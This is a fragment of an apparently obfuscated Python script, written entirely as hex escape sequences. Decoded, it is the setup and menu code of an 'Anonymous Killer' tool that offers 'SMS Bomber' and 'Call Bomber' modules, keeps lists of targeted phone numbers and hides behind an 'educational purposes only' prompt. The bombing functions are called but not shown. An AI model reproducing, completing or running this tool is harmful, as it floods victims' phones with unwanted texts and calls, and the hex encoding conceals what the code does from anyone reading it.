47\x52\x45\x45\x4e\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x54\x68\x61\x6e\x6b\x73\x20\x46\x6f\x72\x20\x55\x73\x69\x6e\x67\x20\x54\x68\x69\x73\x20\x54\x6f\x6f\x6c\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x23\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x71\x28\x29\x3a\x0a\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x22\x5c\x6e\x44\x6f\x20\x79\x6f\x75\x20\x61\x67\x72\x65\x65\x20\x74\x6f\x20\x75\x73\x65\x20\x74\x68\x69\x73\x20\x74\x6f\x6f\x6c\x20\x66\x6f\x72\x20\x65\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x73\x20\x6f\x6e\x6c\x79\x3f\x20\x7b\x35\x7d\x28\x7b\x33\x7d\x59\x7b\x35\x7d\x2f\x7b\x30\x7d\x4e\x7b\x35\x7d\x29\x5c\x6e\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x27\x59\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x35\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x7b\x30\x7d\x59\x4f\x55\x20\x41\x52\x45\x20\x4e\x4f\x54\x20\x41\x55\x54\x48\x4f\x52\x49\x5a\x45\x44\x20\x54\x4f\x20\x55\x53\x45\x20\x54\x48\x49\x53\x20\x54\x4f\x4f\x4c\x2e\x59\x4f\x55\x20\x43\x41\x4e\x20\x4f\x4e\x4c\x59\x20\x55\x53\x45\x20\x49\x54\x20\x46\x4f\x52\x20\x45\x44\x55\x43\x41\x54\x49\x4f\x4e\x41\x4c\x20\x50\x55\x52\x50\x4f\x53\x45\x2e\x21\x20\x5d\x7b\x34\x7d\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6c\x6f\x67\x6f\x0a\x20\x20\x20\x20\x41\x61\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x0a\x20\x20\x20\x20\x42\x62\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x0a\x20\x20\x20\x20\x43\x63\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x0a\x20\x20\x20\x20\x44\x64\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x0a\x20\x20\x20\x20\x45\x65\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x0a\x20\x20\x20\x20\x46\x66\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x0a\x20\x20\x20\x20\x78\x58\x3d\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x5b\x41\x61\x2c\x42\x62\x2c\x43\x63\x2c\x44\x64\x2c\x45\x65\x2c\x46\x66\x5d\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x58\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x57\x65\x6c\x63\x6f\x6d\x65\x20\x54\x6f\x20\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x20\x4b\x69\x6c\x6c\x65\x72\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x44\x45\x46\x41\x55\x4c\x54\x20\x29\x29\x0a\x20\x20\x20\x20\x0a\x64\x65\x66\x20\x72\x65\x6d\x73\x70\x28\x6e\x75\x6d\x29\x3a\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x20\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x2d\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x6e\x75\x6d\x0a\x0a\x64\x65\x66\x20\x6e\x65\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x6d\x20\x3d\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x77\x67\x65\x74\x20\x2d\x71\x20\x2d\x2d\x73\x70\x69\x64\x65\x72\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x27\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x23\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x75\x72\x6e\x20\x6f\x6e\x20\x79\x6f\x75\x72\x20\x69\x6e\x74\x65\x72\x6e\x65\x74\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x20\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x32\x7d\x5b\x7b\x30\x7d\x3e\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x73\x74\x61\x6c\x6c\x69\x6e\x67\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x20\x63\x75\x72\x6c\x20\x2d\x79\x22\x29\x23\x66\x69\x67\x6c\x65\x74\x20\x74\x6f\x69\x6c\x65\x74\x20\x62\x6f\x78\x65\x73\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x61\x70\x74\x20\x69\x6e\x73\x74\x61\x6c\x6c\x20\x70\x79\x74\x68\x6f\x6e\x33\x2d\x70\x69\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x6c\x6f\x76\x65\x22\x2c\x20\x22\x77\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x5c\x74\x5c\x74\x75\x20\x6c\x6f\x6f\x6b\x20\x73\x6f\x20\x62\x65\x61\x75\x74\x69\x66\x75\x6c\x20\x3a\x29\x5c\x6e\x5c\x6e\x74\x68\x69\x73\x20\x69\x73\x20\x63\x72\x65\x61\x74\x20\x62\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x0a\x64\x65\x66\x20\x63\x68\x65\x63\x6b\x5f\x74\x6f\x6f\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x69\x66\x20\x70\x61\x74\x68\x2e\x69\x73\x66\x69\x6c\x65\x28\x27\x6c\x6f\x76\x65\x27\x29\x20\x3d\x3d\x20\x46\x61\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x73\x74\x61\x6c\x6c\x5f\x74\x6f\x6f\x6c\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x41\x6c\x6c\x20\x52\x65\x71\x75\x69\x72\x65\x6d\x65\x6e\x74\x73\x20\x46\x6f\x75\x6e\x64\x2e\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x3a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6d\x6f\x64\x75\x6c\x65\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x42\x6f\x6d\x62\x65\x72\x20\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x42\x6f\x6d\x62\x65\x72\x7b\x34\x7d\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x33\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x34\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x45\x78\x69\x74\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x31\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x2c\x31\x34\x2c\x31\x35\x2c\x31\x36\x5d\x23\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x30\x33\x2c\x31\x30\x34\x2c\x31\x30\x36\x20\x20\x23\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x31\x32\x2c\x31\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x32\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x20\x3d\x20\x5b\x31\x30\x30\x2c\x20\x31\x30\x31\x2c\x20\x31\x30\x32\x2c\x20\x31\x30\x33\x2c\x20\x31\x30\x34\x2c\x20\x31\x30\x36\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x70\x6e\x2c\x20\x6e\x6d\x2c\x20\x64\x6c\x2c\x20\x63\x68\x2c\x20\x73\x74\x72\x28\x63\x63\x29\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x33\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x7b\x30\x7d\x5b\x7b\x35\x7d\x33\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x54\x6f\x20\x44\x65\x6c\x65\x74\x65\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x61\x71\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x32\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x61\x74\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x71\x20\x3d\x3d\x20\x22\x33\x22\x20\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x7b\x30\x7d\x5b\x7b\x32\x7d\x20\x53\x45\x4c\x45\x43\x54\x20\x41\x4e\x59\x20\x4d\x4f\x44\x55\x4c\x45\x20\x21\x21\x7b\x30\x7d\x5d\x20\x5c\x6e\x7b\x35\x7d\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x7b\x34\x7d\x22\x2e